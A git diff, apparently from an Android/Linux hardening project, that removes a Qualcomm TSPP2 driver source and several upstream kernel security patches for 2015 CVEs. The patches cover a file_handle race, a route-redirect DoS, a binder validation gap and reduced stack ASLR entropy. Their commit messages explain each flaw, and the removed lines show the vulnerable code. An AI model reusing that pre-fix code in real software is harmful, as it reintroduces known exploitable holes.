-- */ --static irqreturn_t tspp2_isr(int irq, void *dev) --{ -- struct tspp2_device *device = dev; -- struct tspp2_src *src = NULL; -- struct tspp2_filter *f = NULL; -- unsigned long ext_reg = 0; -- unsigned long val = 0; -- unsigned long flags; -- u32 i = 0, j = 0; -- u32 global_bitmask = 0; -- u32 src_bitmask[TSPP2_NUM_MEM_INPUTS] = {0}; -- u32 filter_bitmask[TSPP2_NUM_CONTEXTS] = {0}; -- u32 reg = 0; -- -- reg = readl_relaxed(device->base + TSPP2_GLOBAL_IRQ_STATUS); -- -- if (reg & (0x1 << GLOBAL_IRQ_TSP_INVALID_AF_OFFS)) { -- device->irq_stats.global.tsp_invalid_af_control++; -- global_bitmask |= TSPP2_GLOBAL_EVENT_INVALID_AF_CTRL; -- } -- -- if (reg & (0x1 << GLOBAL_IRQ_TSP_INVALID_LEN_OFFS)) { -- device->irq_stats.global.tsp_invalid_length++; -- global_bitmask |= TSPP2_GLOBAL_EVENT_INVALID_AF_LENGTH; -- } -- -- if (reg & (0x1 << GLOBAL_IRQ_PES_NO_SYNC_OFFS)) { -- device->irq_stats.global.pes_no_sync++; -- global_bitmask |= TSPP2_GLOBAL_EVENT_PES_NO_SYNC; -- } -- -- if (reg & (0x1 << GLOBAL_IRQ_ENCRYPT_LEVEL_ERR_OFFS)) -- device->irq_stats.global.encrypt_level_err++; -- -- if (reg & (0x1 << GLOBAL_IRQ_KEY_NOT_READY_OFFS)) { -- ext_reg = readl_relaxed(device->base + -- TSPP2_KEY_NOT_READY_IRQ_STATUS); -- for_each_set_bit(i, &ext_reg, TSPP2_NUM_KEYTABLES) -- device->irq_stats.kt[i].key_not_ready++; -- writel_relaxed(ext_reg, device->base + -- TSPP2_KEY_NOT_READY_IRQ_CLEAR); -- } -- -- if (reg & (0x1 << GLOBAL_IRQ_UNEXPECTED_RESET_OFFS)) { -- ext_reg = readl_relaxed(device->base + -- TSPP2_UNEXPECTED_RST_IRQ_STATUS); -- for_each_set_bit(i, &ext_reg, TSPP2_NUM_PIPES) -- device->irq_stats.pipe[i].unexpected_reset++; -- writel_relaxed(ext_reg, device->base + -- TSPP2_UNEXPECTED_RST_IRQ_CLEAR); -- } -- -- if (reg & (0x1 << GLOBAL_IRQ_WRONG_PIPE_DIR_OFFS)) { -- ext_reg = readl_relaxed(device->base + -- TSPP2_WRONG_PIPE_DIR_IRQ_STATUS); -- for_each_set_bit(i, &ext_reg, TSPP2_NUM_PIPES) -- device->irq_stats.pipe[i].wrong_pipe_direction++; -- writel_relaxed(ext_reg, 
device->base + -- TSPP2_WRONG_PIPE_DIR_IRQ_CLEAR); -- } -- -- if (reg & (0x1 << GLOBAL_IRQ_QSB_RESP_ERR_OFFS)) { -- global_bitmask |= TSPP2_GLOBAL_EVENT_TX_FAIL; -- ext_reg = readl_relaxed(device->base + -- TSPP2_QSB_RESPONSE_ERROR_IRQ_STATUS); -- for_each_set_bit(i, &ext_reg, TSPP2_NUM_PIPES) -- device->irq_stats.pipe[i].qsb_response_error++; -- writel_relaxed(ext_reg, device->base + -- TSPP2_QSB_RESPONSE_ERROR_IRQ_CLEAR); -- } -- -- if (reg & (0x1 << GLOBAL_IRQ_SC_GO_HIGH_OFFS)) { -- for (j = 0; j < 3; j++) { -- ext_reg = readl_relaxed(device->base + -- TSPP2_SC_GO_HIGH_STATUS(j)); -- for_each_set_bit(i, &ext_reg, 32) { -- filter_bitmask[j*32 + i] |= -- TSPP2_FILTER_EVENT_SCRAMBLING_HIGH; -- device->irq_stats.ctx[j*32 + i].sc_go_high++; -- } -- writel_relaxed(ext_reg, device->base + -- TSPP2_SC_GO_HIGH_CLEAR(j)); -- } -- } -- -- if (reg & (0x1 << GLOBAL_IRQ_SC_GO_LOW_OFFS)) { -- for (j = 0; j < 3; j++) { -- ext_reg = readl_relaxed(device->base + -- TSPP2_SC_GO_LOW_STATUS(j)); -- for_each_set_bit(i, &ext_reg, 32) { -- filter_bitmask[j*32 + i] |= -- TSPP2_FILTER_EVENT_SCRAMBLING_LOW; -- device->irq_stats.ctx[j*32 + i].sc_go_low++; -- } -- writel_relaxed(ext_reg, device->base + -- TSPP2_SC_GO_LOW_CLEAR(j)); -- } -- } -- -- if (reg & (0xFF << GLOBAL_IRQ_READ_FAIL_OFFS)) { -- val = ((reg & (0xFF << GLOBAL_IRQ_READ_FAIL_OFFS)) >> -- GLOBAL_IRQ_READ_FAIL_OFFS); -- for_each_set_bit(i, &val, TSPP2_NUM_MEM_INPUTS) { -- src_bitmask[i] |= TSPP2_SRC_EVENT_MEMORY_READ_ERROR; -- device->irq_stats.src[i].read_failure++; -- } -- } -- -- if (reg & (0xFF << GLOBAL_IRQ_FC_STALL_OFFS)) { -- val = ((reg & (0xFF << GLOBAL_IRQ_FC_STALL_OFFS)) >> -- GLOBAL_IRQ_FC_STALL_OFFS); -- for_each_set_bit(i, &val, TSPP2_NUM_MEM_INPUTS) { -- src_bitmask[i] |= TSPP2_SRC_EVENT_FLOW_CTRL_STALL; -- device->irq_stats.src[i].flow_control_stall++; -- } -- } -- -- spin_lock_irqsave(&device->spinlock, flags); -- -- /* Invoke user callback for global events */ -- if (device->event_callback && (global_bitmask 
& device->event_bitmask)) -- tspp2_event_work_prepare(device, device->event_callback, -- device->event_cookie, -- (global_bitmask & device->event_bitmask)); -- -- /* Invoke user callbacks on memory source events */ -- for (i = 0; i < TSPP2_NUM_MEM_INPUTS; i++) { -- src = &device->mem_sources[i]; -- if (src->event_callback && -- (src_bitmask[src->hw_index] & src->event_bitmask)) -- tspp2_event_work_prepare(device, -- src->event_callback, -- src->event_cookie, -- (src_bitmask[src->hw_index] & -- src->event_bitmask)); -- } -- -- /* Invoke user callbacks on filter events */ -- for (i = 0; i < TSPP2_NUM_AVAIL_FILTERS; i++) { -- f = &device->filters[i]; -- if (f->event_callback && -- (f->event_bitmask & filter_bitmask[f->context])) -- tspp2_event_work_prepare(device, -- f->event_callback, -- f->event_cookie, -- (f->event_bitmask & -- filter_bitmask[f->context])); -- } -- -- spin_unlock_irqrestore(&device->spinlock, flags); -- -- /* -- * Clear global interrupts. Note bits [9:4] are an aggregation of -- * other IRQs, and are reserved in the TSPP2_GLOBAL_IRQ_CLEAR register. -- */ -- reg &= ~(0x0FFF << GLOBAL_IRQ_CLEAR_RESERVED_OFFS); -- writel_relaxed(reg, device->base + TSPP2_GLOBAL_IRQ_CLEAR); -- /* -- * Before returning IRQ_HANDLED to the generic interrupt handling -- * framework, we need to make sure all operations, including clearing of -- * interrupt status registers in the hardware, are performed. -- * Thus a barrier after clearing the interrupt status register -- * is required to guarantee that the interrupt status register has -- * really been cleared by the time we return from this handler. -- */ -- wmb(); -- -- return IRQ_HANDLED; --} -- --/** -- * tsif_isr() - TSIF interrupt handler. -- * -- * @irq: Interrupt number. -- * @dev: TSIF device that generated the interrupt. -- * -- * Handle TSIF HW interrupt. Collect HW statistics and, if the user registered -- * a relevant source callback, invoke it. 
-- * -- * Return IRQ_HANDLED on success, IRQ_NONE on irrelevant interrupts. -- */ --static irqreturn_t tsif_isr(int irq, void *dev) --{ -- u32 src_bitmask = 0; -- unsigned long flags; -- struct tspp2_src *src = NULL; -- struct tspp2_tsif_device *tsif_device = dev; -- u32 sts_ctl = 0; -- -- sts_ctl = readl_relaxed(tsif_device->base + TSPP2_TSIF_STS_CTL); -- -- if (!(sts_ctl & (TSIF_STS_CTL_PACK_AVAIL | -- TSIF_STS_CTL_PKT_WRITE_ERR | -- TSIF_STS_CTL_PKT_READ_ERR | -- TSIF_STS_CTL_OVERFLOW | -- TSIF_STS_CTL_LOST_SYNC | -- TSIF_STS_CTL_TIMEOUT))) { -- return IRQ_NONE; -- } -- -- if (sts_ctl & TSIF_STS_CTL_PKT_WRITE_ERR) { -- src_bitmask |= TSPP2_SRC_EVENT_TSIF_PKT_WRITE_ERROR; -- tsif_device->stat_pkt_write_err++; -- } -- -- if (sts_ctl & TSIF_STS_CTL_PKT_READ_ERR) { -- src_bitmask |= TSPP2_SRC_EVENT_TSIF_PKT_READ_ERROR; -- tsif_device->stat_pkt_read_err++; -- } -- -- if (sts_ctl & TSIF_STS_CTL_OVERFLOW) { -- src_bitmask |= TSPP2_SRC_EVENT_TSIF_OVERFLOW; -- tsif_device->stat_overflow++; -- } -- -- if (sts_ctl & TSIF_STS_CTL_LOST_SYNC) { -- src_bitmask |= TSPP2_SRC_EVENT_TSIF_LOST_SYNC; -- tsif_device->stat_lost_sync++; -- } -- -- if (sts_ctl & TSIF_STS_CTL_TIMEOUT) { -- src_bitmask |= TSPP2_SRC_EVENT_TSIF_TIMEOUT; -- tsif_device->stat_timeout++; -- } -- -- /* Invoke user TSIF source callbacks if registered for these events */ -- src = &tsif_device->dev->tsif_sources[tsif_device->hw_index]; -- -- spin_lock_irqsave(&src->device->spinlock, flags); -- -- if (src->event_callback && (src->event_bitmask & src_bitmask)) -- tspp2_event_work_prepare(tsif_device->dev, src->event_callback, -- src->event_cookie, (src->event_bitmask & src_bitmask)); -- -- spin_unlock_irqrestore(&src->device->spinlock, flags); -- -- writel_relaxed(sts_ctl, tsif_device->base + TSPP2_TSIF_STS_CTL); -- /* -- * Before returning IRQ_HANDLED to the generic interrupt handling -- * framework, we need to make sure all operations, including clearing of -- * interrupt status registers in the hardware, are 
performed. -- * Thus a barrier after clearing the interrupt status register -- * is required to guarantee that the interrupt status register has -- * really been cleared by the time we return from this handler. -- */ -- wmb(); -- -- return IRQ_HANDLED; --} -- --/** -- * msm_tspp2_map_irqs() - Get and request IRQs. -- * -- * @pdev: Platform device, containing platform information. -- * @device: TSPP2 device. -- * -- * Helper function to get IRQ numbers from the platform device and request -- * the IRQs (i.e., set interrupt handlers) for the TSPP2 and TSIF interrupts. -- * -- * Return 0 on success, error value otherwise. -- */ --static int msm_tspp2_map_irqs(struct platform_device *pdev, -- struct tspp2_device *device) --{ -- int rc; -- int i; -- -- /* get IRQ numbers from platform information */ -- -- rc = platform_get_irq_byname(pdev, "TSPP2"); -- if (rc > 0) { -- device->tspp2_irq = rc; -- } else { -- dev_err(&pdev->dev, "%s: Failed to get TSPP2 IRQ", __func__); -- return -EINVAL; -- } -- -- rc = platform_get_irq_byname(pdev, "TSIF0"); -- if (rc > 0) { -- device->tsif_devices[0].tsif_irq = rc; -- } else { -- dev_err(&pdev->dev, "%s: Failed to get TSIF0 IRQ", __func__); -- return -EINVAL; -- } -- -- rc = platform_get_irq_byname(pdev, "TSIF1"); -- if (rc > 0) { -- device->tsif_devices[1].tsif_irq = rc; -- } else { -- dev_err(&pdev->dev, "%s: Failed to get TSIF1 IRQ", __func__); -- return -EINVAL; -- } -- -- rc = platform_get_irq_byname(pdev, "TSPP2_BAM"); -- if (rc > 0) { -- device->bam_irq = rc; -- } else { -- dev_err(&pdev->dev, -- "%s: Failed to get TSPP2 BAM IRQ", __func__); -- return -EINVAL; -- } -- -- rc = request_irq(device->tspp2_irq, tspp2_isr, IRQF_SHARED, -- dev_name(&pdev->dev), device); -- if (rc) { -- dev_err(&pdev->dev, -- "%s: Failed to request TSPP2 IRQ %d : %d", -- __func__, device->tspp2_irq, rc); -- goto request_irq_err; -- } -- -- for (i = 0; i < TSPP2_NUM_TSIF_INPUTS; i++) { -- rc = request_irq(device->tsif_devices[i].tsif_irq, -- tsif_isr, 
IRQF_SHARED, -- dev_name(&pdev->dev), &device->tsif_devices[i]); -- if (rc) { -- dev_warn(&pdev->dev, -- "%s: Failed to request TSIF%d IRQ: %d", -- __func__, i, rc); -- device->tsif_devices[i].tsif_irq = 0; -- } -- } -- -- return 0; -- --request_irq_err: -- device->tspp2_irq = 0; -- device->tsif_devices[0].tsif_irq = 0; -- device->tsif_devices[1].tsif_irq = 0; -- device->bam_irq = 0; -- -- return -EINVAL; --} -- --/* Device driver probe function */ --static int msm_tspp2_probe(struct platform_device *pdev) --{ -- int rc = 0; -- struct msm_tspp2_platform_data *data; -- struct tspp2_device *device; -- struct msm_bus_scale_pdata *tspp2_bus_pdata = NULL; -- -- if (pdev->dev.of_node) { -- /* Get information from device tree */ -- data = msm_tspp2_dt_to_pdata(pdev); -- /* get device ID */ -- rc = of_property_read_u32(pdev->dev.of_node, -- "cell-index", &pdev->id); -- if (rc) -- pdev->id = -1; -- -- tspp2_bus_pdata = msm_bus_cl_get_pdata(pdev); -- pdev->dev.platform_data = data; -- } else { -- /* Get information from platform data */ -- data = pdev->dev.platform_data; -- } -- if (!data) { -- pr_err("%s: Platform data not available\n", __func__); -- return -EINVAL; -- } -- -- /* Verify device id is valid */ -- if ((pdev->id < 0) || (pdev->id >= TSPP2_NUM_DEVICES)) { -- pr_err("%s: Invalid device ID %d\n", __func__, pdev->id); -- return -EINVAL; -- } -- -- device = devm_kzalloc(&pdev->dev, -- sizeof(struct tspp2_device), -- GFP_KERNEL); -- if (!device) { -- pr_err("%s: Failed to allocate memory for device\n", __func__); -- return -ENOMEM; -- } -- platform_set_drvdata(pdev, device); -- device->pdev = pdev; -- device->dev = &pdev->dev; -- device->dev_id = pdev->id; -- device->opened = 0; -- -- /* Register bus client */ -- if (tspp2_bus_pdata) { -- device->bus_client = -- msm_bus_scale_register_client(tspp2_bus_pdata); -- if (!device->bus_client) -- pr_err("%s: Unable to register bus client\n", __func__); -- } else { -- pr_err("%s: Platform bus client data not available. 
Continue anyway...\n", -- __func__); -- } -- -- rc = msm_tspp2_iommu_info_get(pdev, device); -- if (rc) { -- pr_err("%s: Failed to get IOMMU information\n", __func__); -- goto err_bus_client; -- } -- -- rc = msm_tspp2_clocks_setup(pdev, device); -- if (rc) -- goto err_clocks_setup; -- -- rc = msm_tspp2_map_io_memory(pdev, device); -- if (rc) -- goto err_map_io_memory; -- -- rc = msm_tspp2_map_irqs(pdev, device); -- if (rc) -- goto err_map_irq; -- -- mutex_init(&device->mutex); -- -- tspp2_devices[pdev->id] = device; -- -- tspp2_debugfs_init(device); -- -- return rc; -- --err_map_irq: -- iounmap(device->base); -- iounmap(device->tsif_devices[0].base); -- iounmap(device->tsif_devices[1].base); -- iounmap(device->bam_props.virt_addr); -- --err_map_io_memory: -- tspp2_clocks_put(device); -- --err_clocks_setup: -- msm_tspp2_iommu_info_free(device); -- --err_bus_client: -- if (device->bus_client) -- msm_bus_scale_unregister_client(device->bus_client); -- -- return rc; --} -- --/* Device driver remove function */ --static int msm_tspp2_remove(struct platform_device *pdev) --{ -- int i; -- int rc = 0; -- struct tspp2_device *device = platform_get_drvdata(pdev); -- -- tspp2_debugfs_exit(device); -- -- if (device->tspp2_irq) -- free_irq(device->tspp2_irq, device); -- -- for (i = 0; i < TSPP2_NUM_TSIF_INPUTS; i++) -- if (device->tsif_devices[i].tsif_irq) -- free_irq(device->tsif_devices[i].tsif_irq, -- &device->tsif_devices[i]); -- -- /* Unmap memory */ -- iounmap(device->base); -- iounmap(device->tsif_devices[0].base); -- iounmap(device->tsif_devices[1].base); -- iounmap(device->bam_props.virt_addr); -- -- msm_tspp2_iommu_info_free(device); -- -- if (device->bus_client) -- msm_bus_scale_unregister_client(device->bus_client); -- -- mutex_destroy(&device->mutex); -- -- tspp2_clocks_put(device); -- -- return rc; --} -- --/* Power Management */ -- --static int tspp2_runtime_suspend(struct device *dev) --{ -- int ret = 0; -- struct tspp2_device *device; -- struct platform_device 
*pdev; -- -- /* -- * HW manages power collapse automatically. -- * Disabling AHB and Core clocsk and "cancelling" bus bandwidth voting. -- */ -- -- pdev = container_of(dev, struct platform_device, dev); -- device = platform_get_drvdata(pdev); -- -- mutex_lock(&device->mutex); -- -- if (!device->opened) -- ret = -EPERM; -- else -- ret = tspp2_reg_clock_stop(device); -- -- mutex_unlock(&device->mutex); -- -- dev_dbg(dev, "%s\n", __func__); -- -- return ret; --} -- --static int tspp2_runtime_resume(struct device *dev) --{ -- int ret = 0; -- struct tspp2_device *device; -- struct platform_device *pdev; -- -- /* -- * HW manages power collapse automatically. -- * Enabling AHB and Core clocks to allow access to unit registers, -- * and voting for the required bus bandwidth for register access. -- */ -- -- pdev = container_of(dev, struct platform_device, dev); -- device = platform_get_drvdata(pdev); -- -- mutex_lock(&device->mutex); -- -- if (!device->opened) -- ret = -EPERM; -- else -- ret = tspp2_reg_clock_start(device); -- -- mutex_unlock(&device->mutex); -- -- dev_dbg(dev, "%s\n", __func__); -- -- return ret; --} -- --static const struct dev_pm_ops tspp2_dev_pm_ops = { -- .runtime_suspend = tspp2_runtime_suspend, -- .runtime_resume = tspp2_runtime_resume, --}; -- --/* Platform driver information */ -- --static struct of_device_id msm_tspp2_match_table[] = { -- {.compatible = "qcom,msm_tspp2"}, -- {} --}; -- --static struct platform_driver msm_tspp2_driver = { -- .probe = msm_tspp2_probe, -- .remove = msm_tspp2_remove, -- .driver = { -- .name = "msm_tspp2", -- .pm = &tspp2_dev_pm_ops, -- .of_match_table = msm_tspp2_match_table, -- }, --}; -- --/** -- * tspp2_module_init() - TSPP2 driver module init function. -- * -- * Return 0 on success, error value otherwise. 
-- */
--static int __init tspp2_module_init(void)
--{
-- int rc;
--
-- rc = platform_driver_register(&msm_tspp2_driver);
-- if (rc)
-- pr_err("%s: platform_driver_register failed: %d\n",
-- __func__, rc);
--
-- return rc;
--}
--
--/**
-- * tspp2_module_exit() - TSPP2 driver module exit function.
-- */
--static void __exit tspp2_module_exit(void)
--{
-- platform_driver_unregister(&msm_tspp2_driver);
--}
--
--module_init(tspp2_module_init);
--module_exit(tspp2_module_exit);
--
--MODULE_DESCRIPTION("TSPP2 (Transport Stream Packet Processor v2) platform device driver");
--MODULE_LICENSE("GPL v2");
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-1420/3.2-^3.19/0001.patch b/Patches/Linux_CVEs/CVE-2015-1420/3.2-^3.19/0001.patch
deleted file mode 100644
index 9d201873..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1420/3.2-^3.19/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From 8dfc8b9e8432f50606820b40a7d63618d9d61a07 Mon Sep 17 00:00:00 2001
-From: Sasha Levin
-Date: Wed, 28 Jan 2015 15:30:43 -0500
-Subject: vfs: read file_handle only once in handle_to_path
-
-commit 161f873b89136eb1e69477c847d5a5033239d9ba upstream.
-
-We used to read file_handle twice. Once to get the amount of extra
-bytes, and once to fetch the entire structure.
-
-This may be problematic since we do size verifications only after the
-first read, so if the number of extra bytes changes in userspace between
-the first and second calls, we'll have an incoherent view of
-file_handle.
-
-Instead, read the constant size once, and copy that over to the final
-structure without having to re-read it again.
-
-Signed-off-by: Sasha Levin
-Cc: Al Viro
-Signed-off-by: Linus Torvalds
-Signed-off-by: Ben Hutchings
----
- fs/fhandle.c | 5 +++--
- 1 file changed, 3 insertions(+), 2 deletions(-)
-
-diff --git a/fs/fhandle.c b/fs/fhandle.c
-index 6b08864..c9e18f3 100644
---- a/fs/fhandle.c
-+++ b/fs/fhandle.c
-@@ -196,8 +196,9 @@ static int handle_to_path(int mountdirfd, struct file_handle __user *ufh,
- goto out_err;
- }
- /* copy the full handle */
-- if (copy_from_user(handle, ufh,
-- sizeof(struct file_handle) +
-+ *handle = f_handle;
-+ if (copy_from_user(&handle->f_handle,
-+ &ufh->f_handle,
- f_handle.handle_bytes)) {
- retval = -EFAULT;
- goto out_handle;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-1465/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-1465/ANY/0001.patch
deleted file mode 100644
index 30f515a8..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1465/ANY/0001.patch
+++ /dev/null
@@ -1,100 +0,0 @@
-From df4d92549f23e1c037e83323aff58a21b3de7fe0 Mon Sep 17 00:00:00 2001
-From: Hannes Frederic Sowa
-Date: Fri, 23 Jan 2015 12:01:26 +0100
-Subject: ipv4: try to cache dst_entries which would cause a redirect
-
-Not caching dst_entries which cause redirects could be exploited by hosts
-on the same subnet, causing a severe DoS attack. This effect aggravated
-since commit f88649721268999 ("ipv4: fix dst race in sk_dst_get()").
-
-Lookups causing redirects will be allocated with DST_NOCACHE set which
-will force dst_release to free them via RCU. Unfortunately waiting for
-RCU grace period just takes too long, we can end up with >1M dst_entries
-waiting to be released and the system will run OOM. rcuos threads cannot
-catch up under high softirq load.
-
-Attaching the flag to emit a redirect later on to the specific skb allows
-us to cache those dst_entries thus reducing the pressure on allocation
-and deallocation.
-
-This issue was discovered by Marcelo Leitner.
-
-Cc: Julian Anastasov
-Signed-off-by: Marcelo Leitner
-Signed-off-by: Florian Westphal
-Signed-off-by: Hannes Frederic Sowa
-Signed-off-by: Julian Anastasov
-Signed-off-by: David S.
Miller
----
- include/net/ip.h | 11 ++++++-----
- net/ipv4/ip_forward.c | 3 ++-
- net/ipv4/route.c | 9 +++++----
- 3 files changed, 13 insertions(+), 10 deletions(-)
-
-diff --git a/include/net/ip.h b/include/net/ip.h
-index 0bb6207..f7cbd70 100644
---- a/include/net/ip.h
-+++ b/include/net/ip.h
-@@ -39,11 +39,12 @@ struct inet_skb_parm {
- struct ip_options opt; /* Compiled IP options */
- unsigned char flags;
-
--#define IPSKB_FORWARDED 1
--#define IPSKB_XFRM_TUNNEL_SIZE 2
--#define IPSKB_XFRM_TRANSFORMED 4
--#define IPSKB_FRAG_COMPLETE 8
--#define IPSKB_REROUTED 16
-+#define IPSKB_FORWARDED BIT(0)
-+#define IPSKB_XFRM_TUNNEL_SIZE BIT(1)
-+#define IPSKB_XFRM_TRANSFORMED BIT(2)
-+#define IPSKB_FRAG_COMPLETE BIT(3)
-+#define IPSKB_REROUTED BIT(4)
-+#define IPSKB_DOREDIRECT BIT(5)
-
- u16 frag_max_size;
- };
-diff --git a/net/ipv4/ip_forward.c b/net/ipv4/ip_forward.c
-index 3a83ce5..787b3c2 100644
---- a/net/ipv4/ip_forward.c
-+++ b/net/ipv4/ip_forward.c
-@@ -129,7 +129,8 @@ int ip_forward(struct sk_buff *skb)
- * We now generate an ICMP HOST REDIRECT giving the route
- * we calculated.
- */
-- if (rt->rt_flags&RTCF_DOREDIRECT && !opt->srr && !skb_sec_path(skb))
-+ if (IPCB(skb)->flags & IPSKB_DOREDIRECT && !opt->srr &&
-+ !skb_sec_path(skb))
- ip_rt_send_redirect(skb);
-
- skb->priority = rt_tos2priority(iph->tos);
-diff --git a/net/ipv4/route.c b/net/ipv4/route.c
-index 6a2155b..d58dd0e 100644
---- a/net/ipv4/route.c
-+++ b/net/ipv4/route.c
-@@ -1554,11 +1554,10 @@ static int __mkroute_input(struct sk_buff *skb,
-
- do_cache = res->fi && !itag;
- if (out_dev == in_dev && err && IN_DEV_TX_REDIRECTS(out_dev) &&
-+ skb->protocol == htons(ETH_P_IP) &&
- (IN_DEV_SHARED_MEDIA(out_dev) ||
-- inet_addr_onlink(out_dev, saddr, FIB_RES_GW(*res)))) {
-- flags |= RTCF_DOREDIRECT;
-- do_cache = false;
-- }
-+ inet_addr_onlink(out_dev, saddr, FIB_RES_GW(*res))))
-+ IPCB(skb)->flags |= IPSKB_DOREDIRECT;
-
- if (skb->protocol != htons(ETH_P_IP)) {
- /* Not IP (i.e. ARP).
Do not create route, if it is
-@@ -2303,6 +2302,8 @@ static int rt_fill_info(struct net *net, __be32 dst, __be32 src,
- r->rtm_flags = (rt->rt_flags & ~0xFFFF) | RTM_F_CLONED;
- if (rt->rt_flags & RTCF_NOTIFY)
- r->rtm_flags |= RTM_F_NOTIFY;
-+ if (IPCB(skb)->flags & IPSKB_DOREDIRECT)
-+ r->rtm_flags |= RTCF_DOREDIRECT;
-
- if (nla_put_be32(skb, RTA_DST, dst))
- goto nla_put_failure;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-1534/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-1534/ANY/0001.patch
deleted file mode 100644
index 24634bc3..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1534/ANY/0001.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-diff --git a/drivers/staging/android/binder.c b/drivers/staging/android/binder.c
-index 2e4f44f..0dc39e3 100644
---- a/drivers/staging/android/binder.c
-+++ b/drivers/staging/android/binder.c
-@@ -3579,13 +3579,25 @@
-
- static int binder_proc_show(struct seq_file *m, void *unused)
- {
-+ struct binder_proc *itr;
- struct binder_proc *proc = m->private;
-+ struct hlist_node *pos;
- int do_lock = !binder_debug_no_lock;
-+ bool valid_proc = false;
-
- if (do_lock)
- mutex_lock(&binder_lock);
-- seq_puts(m, "binder proc state:\n");
-- print_binder_proc(m, proc, 1);
-+
-+ hlist_for_each_entry(itr, pos, &binder_procs, proc_node) {
-+ if (itr == proc) {
-+ valid_proc = true;
-+ break;
-+ }
-+ }
-+ if (valid_proc) {
-+ seq_puts(m, "binder proc state:\n");
-+ print_binder_proc(m, proc, 1);
-+ }
- if (do_lock)
- mutex_unlock(&binder_lock);
- return 0;
diff --git a/Patches/Linux_CVEs/CVE-2015-1534/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2015-1534/ANY/0001.patch.base64
deleted file mode 100644
index f27d58b4..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1534/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2015-1593/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-1593/ANY/0001.patch
deleted file mode 100644
index b0a281f0..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1593/ANY/0001.patch
+++ /dev/null
@@ -1,112 +0,0 @@
-From 4e7c22d447bb6d7e37bfe39ff658486ae78e8d77 Mon Sep 17 00:00:00 2001
-From: Hector Marco-Gisbert
-Date: Sat, 14 Feb 2015 09:33:50 -0800
-Subject: x86, mm/ASLR: Fix stack randomization on 64-bit systems
-
-The issue is that the stack for processes is not properly randomized on
-64 bit architectures due to an integer overflow.
-
-The affected function is randomize_stack_top() in file
-"fs/binfmt_elf.c":
-
- static unsigned long randomize_stack_top(unsigned long stack_top)
- {
- unsigned int random_variable = 0;
-
- if ((current->flags & PF_RANDOMIZE) &&
- !(current->personality & ADDR_NO_RANDOMIZE)) {
- random_variable = get_random_int() & STACK_RND_MASK;
- random_variable <<= PAGE_SHIFT;
- }
- return PAGE_ALIGN(stack_top) + random_variable;
- return PAGE_ALIGN(stack_top) - random_variable;
- }
-
-Note that, it declares the "random_variable" variable as "unsigned int".
-Since the result of the shifting operation between STACK_RND_MASK (which
-is 0x3fffff on x86_64, 22 bits) and PAGE_SHIFT (which is 12 on x86_64):
-
- random_variable <<= PAGE_SHIFT;
-
-then the two leftmost bits are dropped when storing the result in the
-"random_variable". This variable shall be at least 34 bits long to hold
-the (22+12) result.
-
-These two dropped bits have an impact on the entropy of process stack.
-Concretely, the total stack entropy is reduced by four: from 2^28 to
-2^30 (One fourth of expected entropy).
-
-This patch restores back the entropy by correcting the types involved
-in the operations in the functions randomize_stack_top() and
-stack_maxrandom_size().
-
-The successful fix can be tested with:
-
- $ for i in `seq 1 10`; do cat /proc/self/maps | grep stack; done
- 7ffeda566000-7ffeda587000 rw-p 00000000 00:00 0 [stack]
- 7fff5a332000-7fff5a353000 rw-p 00000000 00:00 0 [stack]
- 7ffcdb7a1000-7ffcdb7c2000 rw-p 00000000 00:00 0 [stack]
- 7ffd5e2c4000-7ffd5e2e5000 rw-p 00000000 00:00 0 [stack]
- ...
-
-Once corrected, the leading bytes should be between 7ffc and 7fff,
-rather than always being 7fff.
-
-Signed-off-by: Hector Marco-Gisbert
-Signed-off-by: Ismael Ripoll
-[ Rebased, fixed 80 char bugs, cleaned up commit message, added test example and CVE ]
-Signed-off-by: Kees Cook
-Cc:
-Cc: Linus Torvalds
-Cc: Andrew Morton
-Cc: Al Viro
-Fixes: CVE-2015-1593
-Link: http://lkml.kernel.org/r/20150214173350.GA18393@www.outflux.net
-Signed-off-by: Borislav Petkov
----
- arch/x86/mm/mmap.c | 6 +++---
- fs/binfmt_elf.c | 5 +++--
- 2 files changed, 6 insertions(+), 5 deletions(-)
-
-diff --git a/arch/x86/mm/mmap.c b/arch/x86/mm/mmap.c
-index 919b912..df4552b 100644
---- a/arch/x86/mm/mmap.c
-+++ b/arch/x86/mm/mmap.c
-@@ -35,12 +35,12 @@ struct va_alignment __read_mostly va_align = {
- .flags = -1,
- };
-
--static unsigned int stack_maxrandom_size(void)
-+static unsigned long stack_maxrandom_size(void)
- {
-- unsigned int max = 0;
-+ unsigned long max = 0;
- if ((current->flags & PF_RANDOMIZE) &&
- !(current->personality & ADDR_NO_RANDOMIZE)) {
-- max = ((-1U) & STACK_RND_MASK) << PAGE_SHIFT;
-+ max = ((-1UL) & STACK_RND_MASK) << PAGE_SHIFT;
- }
-
- return max;
-diff --git a/fs/binfmt_elf.c b/fs/binfmt_elf.c
-index 02b1691..995986b 100644
---- a/fs/binfmt_elf.c
-+++ b/fs/binfmt_elf.c
-@@ -645,11 +645,12 @@ out:
-
- static unsigned long randomize_stack_top(unsigned long stack_top)
- {
-- unsigned int random_variable = 0;
-+ unsigned long random_variable = 0;
-
- if ((current->flags & PF_RANDOMIZE) &&
- !(current->personality & ADDR_NO_RANDOMIZE)) {
-- random_variable = get_random_int() & STACK_RND_MASK;
-+ random_variable = (unsigned long) get_random_int();
-+ random_variable &= STACK_RND_MASK;
- random_variable <<= PAGE_SHIFT;
- }
- #ifdef CONFIG_STACK_GROWSUP
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-1805/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2015-1805/3.10/0002.patch
deleted file mode 100644
index 4df035f9..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1805/3.10/0002.patch
+++ /dev/null
@@ -1,152 +0,0 @@
